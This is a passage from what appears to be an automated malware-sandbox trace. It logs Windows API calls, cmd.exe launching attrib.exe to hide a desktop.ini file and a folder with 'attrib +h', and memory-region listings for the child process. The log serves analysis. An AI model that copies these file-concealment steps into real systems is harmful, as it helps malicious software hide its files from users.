lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.329] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.329] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.329] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.329] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.329] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.329] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.329] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.329] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.329] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.329] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.329] ReadFile (in: hFile=0x58, 
lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.329] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.329] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.330] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.330] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.330] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.330] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.330] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.330] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.330] ReadFile 
(in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.330] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.330] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.330] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.330] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.330] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.330] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.331] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.331] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 
[0132.331] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.331] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.331] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.331] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.331] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.355] _close (_FileHandle=4) returned 0 [0132.355] FindNextFileW (in: hFindFile=0x3ae6d8, lpFindFileData=0x2cee08 | out: lpFindFileData=0x2cee08) returned 0 [0132.356] GetLastError () returned 0x12 [0132.356] FindClose (in: hFindFile=0x3ae6d8 | out: hFindFile=0x3ae6d8) returned 1 [0132.356] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0132.358] _close (_FileHandle=3) returned 0 [0132.358] GetConsoleTitleW (in: lpConsoleTitle=0x2cf240, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0132.358] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0132.358] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0132.359] GetEnvironmentVariableW (in: 
lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0132.359] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x2ceadc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ceadc) returned 0xffffffff [0132.359] GetLastError () returned 0x2 [0132.359] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib", fInfoLevelId=0x1, lpFindFileData=0x2ceadc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ceadc) returned 0xffffffff [0132.359] GetLastError () returned 0x2 [0132.359] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x2ceadc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ceadc) returned 0x3ae6d8 [0132.359] FindClose (in: hFindFile=0x3ae6d8 | out: hFindFile=0x3ae6d8) returned 1 [0132.359] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x2ceadc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ceadc) returned 0xffffffff [0132.360] GetLastError () returned 0x2 [0132.360] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x2ceadc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ceadc) returned 0x3ae6d8 [0132.360] FindClose (in: hFindFile=0x3ae6d8 | out: hFindFile=0x3ae6d8) returned 1 [0132.360] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0132.360] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0132.360] GetConsoleTitleW (in: lpConsoleTitle=0x2cefd4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0132.360] InitializeProcThreadAttributeList (in: lpAttributeList=0x2cee5c, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2cef24 | out: 
lpAttributeList=0x2cee5c, lpSize=0x2cef24) returned 1 [0132.360] UpdateProcThreadAttribute (in: lpAttributeList=0x2cee5c, dwFlags=0x0, Attribute=0x60001, lpValue=0x2cef1c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2cee5c, lpPreviousValue=0x0) returned 1 [0132.360] GetStartupInfoW (in: lpStartupInfo=0x2cee18 | out: lpStartupInfo=0x2cee18*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0132.360] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0132.360] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x2ceeb8*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2cef04 | out: lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\desktop.ini\" ", lpProcessInformation=0x2cef04*(hProcess=0x4c, hThread=0x50, dwProcessId=0xb98, dwThreadId=0xb80)) returned 1 [0132.366] CloseHandle (hObject=0x50) returned 1 [0132.366] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0132.366] GetEnvironmentStringsW () returned 0x3b2e00* [0132.366] FreeEnvironmentStringsW (penv=0x3b2e00) returned 1 [0132.366] 
WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0132.404] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x2cedf8 | out: lpExitCode=0x2cedf8*=0x0) returned 1 [0132.404] CloseHandle (hObject=0x4c) returned 1 [0132.405] _vsnwprintf (in: _Buffer=0x2cef40, _BufferCount=0x13, _Format="%08X", _ArgList=0x2cee04 | out: _Buffer="00000000") returned 8 [0132.405] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0132.405] GetEnvironmentStringsW () returned 0x3b2e00* [0132.405] FreeEnvironmentStringsW (penv=0x3b2e00) returned 1 [0132.405] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0132.405] GetEnvironmentStringsW () returned 0x3b2e00* [0132.405] FreeEnvironmentStringsW (penv=0x3b2e00) returned 1 [0132.405] DeleteProcThreadAttributeList (in: lpAttributeList=0x2cee5c | out: lpAttributeList=0x2cee5c) [0132.405] GetConsoleTitleW (in: lpConsoleTitle=0x2cf240, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0132.405] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0132.405] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0132.406] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0132.406] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x2ceadc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ceadc) returned 0xffffffff [0132.406] GetLastError () returned 0x2 [0132.406] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib", fInfoLevelId=0x1, lpFindFileData=0x2ceadc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ceadc) 
returned 0xffffffff [0132.406] GetLastError () returned 0x2 [0132.406] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x2ceadc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ceadc) returned 0x3ae6d8 [0132.406] FindClose (in: hFindFile=0x3ae6d8 | out: hFindFile=0x3ae6d8) returned 1 [0132.406] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x2ceadc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ceadc) returned 0xffffffff [0132.406] GetLastError () returned 0x2 [0132.407] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x2ceadc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ceadc) returned 0x3ae6d8 [0132.407] FindClose (in: hFindFile=0x3ae6d8 | out: hFindFile=0x3ae6d8) returned 1 [0132.407] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0132.407] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0132.407] GetConsoleTitleW (in: lpConsoleTitle=0x2cefd4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0132.407] InitializeProcThreadAttributeList (in: lpAttributeList=0x2cee5c, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2cef24 | out: lpAttributeList=0x2cee5c, lpSize=0x2cef24) returned 1 [0132.407] UpdateProcThreadAttribute (in: lpAttributeList=0x2cee5c, dwFlags=0x0, Attribute=0x60001, lpValue=0x2cef1c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2cee5c, lpPreviousValue=0x0) returned 1 [0132.407] GetStartupInfoW (in: lpStartupInfo=0x2cee18 | out: lpStartupInfo=0x2cee18*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, 
lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0132.407] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0132.407] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x2ceeb8*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2cef04 | out: lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\"", lpProcessInformation=0x2cef04*(hProcess=0x50, hThread=0x4c, dwProcessId=0xb64, dwThreadId=0xae8)) returned 1 [0132.412] CloseHandle (hObject=0x4c) returned 1 [0132.412] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0132.412] GetEnvironmentStringsW () returned 0x3b3838* [0132.412] FreeEnvironmentStringsW (penv=0x3b3838) returned 1 [0132.412] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0132.457] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x2cedf8 | out: lpExitCode=0x2cedf8*=0x0) returned 1 [0132.457] CloseHandle (hObject=0x50) returned 1 [0132.457] _vsnwprintf (in: _Buffer=0x2cef40, _BufferCount=0x13, _Format="%08X", _ArgList=0x2cee04 | out: _Buffer="00000000") returned 8 [0132.457] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0132.457] GetEnvironmentStringsW () returned 0x3b3838* [0132.457] FreeEnvironmentStringsW (penv=0x3b3838) returned 1 [0132.457] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 
[0132.457] GetEnvironmentStringsW () returned 0x3b3838* [0132.457] FreeEnvironmentStringsW (penv=0x3b3838) returned 1 [0132.457] DeleteProcThreadAttributeList (in: lpAttributeList=0x2cee5c | out: lpAttributeList=0x2cee5c) [0132.457] _get_osfhandle (_FileHandle=1) returned 0x7 [0132.457] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0132.457] _get_osfhandle (_FileHandle=1) returned 0x7 [0132.457] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0132.457] _get_osfhandle (_FileHandle=0) returned 0x3 [0132.457] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0132.458] SetConsoleInputExeNameW () returned 0x1 [0132.458] GetConsoleOutputCP () returned 0x1b5 [0132.458] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0132.458] SetThreadUILanguage (LangId=0x0) returned 0x409 [0132.458] exit (_Code=0) Process: id = "112" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16780" os_pid = "0xb2c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "111" os_parent_pid = "0xaa4" cmd_line = "attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 12319 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 12320 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 
region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 12321 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 12322 start_va = 0x130000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 12323 start_va = 0xa50000 end_va = 0xa56fff entry_point = 0xa50000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 12324 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 12325 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 12326 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 12327 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 12328 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 12329 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 12330 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 12331 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = 
"\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 12332 start_va = 0x280000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 12333 start_va = 0x330000 end_va = 0x42ffff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 12334 start_va = 0x6e440000 end_va = 0x6e45cfff entry_point = 0x6e440000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 12335 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 12336 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 12337 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 12338 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 12339 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 12340 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 12341 
